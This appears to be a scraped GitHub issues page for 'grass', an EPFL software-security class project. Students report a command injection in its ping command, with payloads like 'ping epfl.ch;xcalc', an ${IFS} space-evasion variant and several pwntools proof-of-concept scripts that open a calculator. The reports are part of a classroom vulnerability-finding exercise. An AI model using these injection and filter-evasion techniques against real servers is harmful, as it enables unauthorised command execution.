yannvon / grass Goto Github PK
View Code? Open in Web Editor NEWGRASS is buggier on the other side. EPFL semester project for the Software security class.
GRASS is buggier on the other side. EPFL semester project for the Software security class.
Vulnerability location : commands.cpp:348
Type of vulnerability : The input to the ping function is not sanitized, thus we can use ;
to chain command and execute a calculator.
Exploit : After connecting to the server, the client can simply type :
ping epfl.ch;gnomecalculator
Ping function is vulnerable. There is no sanitization whatsoever of the arguments in the
ping_cmd function in file commands.cpp thus special characters such as "`&; (...) can be
used directly to inject commands (lines 348-349).
string s = "ping -c 1 " + host;
int res = exec (s. c_str (), out);
Evidently they just concatenate the ‘host’ to the ping command without sanitizing and call
exec which is essentially a system call that uses popen.
It is possible to do the following exploit and without need of any authentication because ping
does not require so:
"ping `xcalc`" : this will open a calculator
"ping google.ch;xcalc;" : this will open a calculator
"ping &xcalc&" : this will open a calculator
(...)
Where:
Line 71 in a5b8f5a
They have an "escape" function they use to escape strings that represent a path, but they do not check against any ";" character that one could potentially use to terminate a command and start a new one. Thus, I exploited the ping command by appending another new command (xcalc) that will be executed right after the ping.
Here is a PoC:
#!/usr/bin/env python
from pwn import *
sh = process(['./client', '127.0.0.1', '1337'])
sh.sendline("ping google.ch;xcalc\n")
print sh.interactive()
Where the vulnerability is
In the ping_cmd function, special characters (like ;, & or |) are permitted and not filtered. Moreover, the hostname is directly inserted at the end of the predefined string "ping -c 1 ". This string is then simply executed with the exec function.
Exploitation of the vulnerability
To exploit this vulnerability, it is sufficient to create a parameter of the ping command with no spaces. Since it is possible to use the internal field separator variable in a shell to "emulate" a space, we can construct an exploit just by calling ping on a random host and then use the semicolon and attach another command that execute a remote code (opens a calculator).
After running the server and connecting one client, we can just type on the client the following command and open a calculator like this:
ping google.com;sh${IFS%?}-c${IFS%?}xcalc
which basically corresponds to execute: ping google.com;sh -c xcalc
After running make
, launch the server with ./bin/server
.
Then launch the client with ./bin/client 127.0.0.1 1337
and feed it with
ping stuff;xcalc
which pops a calc on the server side.
Indeed at this line https://github.com/yannvon/grass/blob/master/src/commands.cpp#L348 the user input is not escaped.
One can exploit the ping command to open a calculator using the following poc:
from pwn import *
dirname = "."
server_bin = '/bin/server'
client_bin = '/bin/client'
server = process("".join([dirname,server_bin]))
client = process(["".join([dirname,client_bin]), "127.0.0.1", "1337"])
client.sendline("login u1")
client.sendline("pass p1")
client.sendline("ping ;/bin/xcalc;")
#Prevent the process from stopping
pause()
What: command injection
Where: in the do_ping function
You do not sanitize the input of the do_ping function. I was then able to pop a calc
PoC:
#!/usr/bin/env python
from pwn import *
sh = process(['client', '127.0.0.1', '1337'])
sh.sendline("ping stuff;sh${IFS%?}|${IFS%?}gnome-calculator")
sh.interactive()
I am able to open a calculator when executing the ping command.
Here's a PoC:
'''
This script should be put in yannvonn/grass/ directory and run from there.
This script works on freshly restarted Kali Linux 64 bit VM.
Do not forget to make before running script.
Target: https://github.com/yannvon/grass
Exploit: Command Injection - Open calc through ping command
You can also run this by hand by doing:
make
./bin/server
./bin/client 127.0.0.1 1337
login u1
pass p1
ping wowmuchinject.com;xcalc
'''
from pwn import *
server_bin = './bin/server'
client_bin = './bin/client'
IP = "127.0.0.1"
PORT = "1337"
LOGIN = "login u1"
PASS = "pass p1"
CMD = "ping wowmuchinject;xcalc"
server = process(server_bin)
client = process([client_bin, IP,PORT])
client.sendline(LOGIN)
client.sendline(PASS)
client.sendline(CMD)
print("SERVER: {}".format(server.recvall()))
In this project
In the ping command of this project, there is a vulnerability, if a ";" is added to the end we can then type anything like in a shell in the target server.
Here you can find an example of such a try (this was done on my machine where xcalc is not a program recognized)
`
login u1
pass p1
ping google.fr;xcalc
PING google.fr (172.217.168.3) 56(84) bytes of data.
64 bytes from zrh11s03-in-f3.1e100.net (172.217.168.3): icmp_seq=1 ttl=55 time=5.48 ms
--- google.fr ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 5.482/5.482/5.482/0.000 ms
sh: xcalc : commande introuvable
`
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.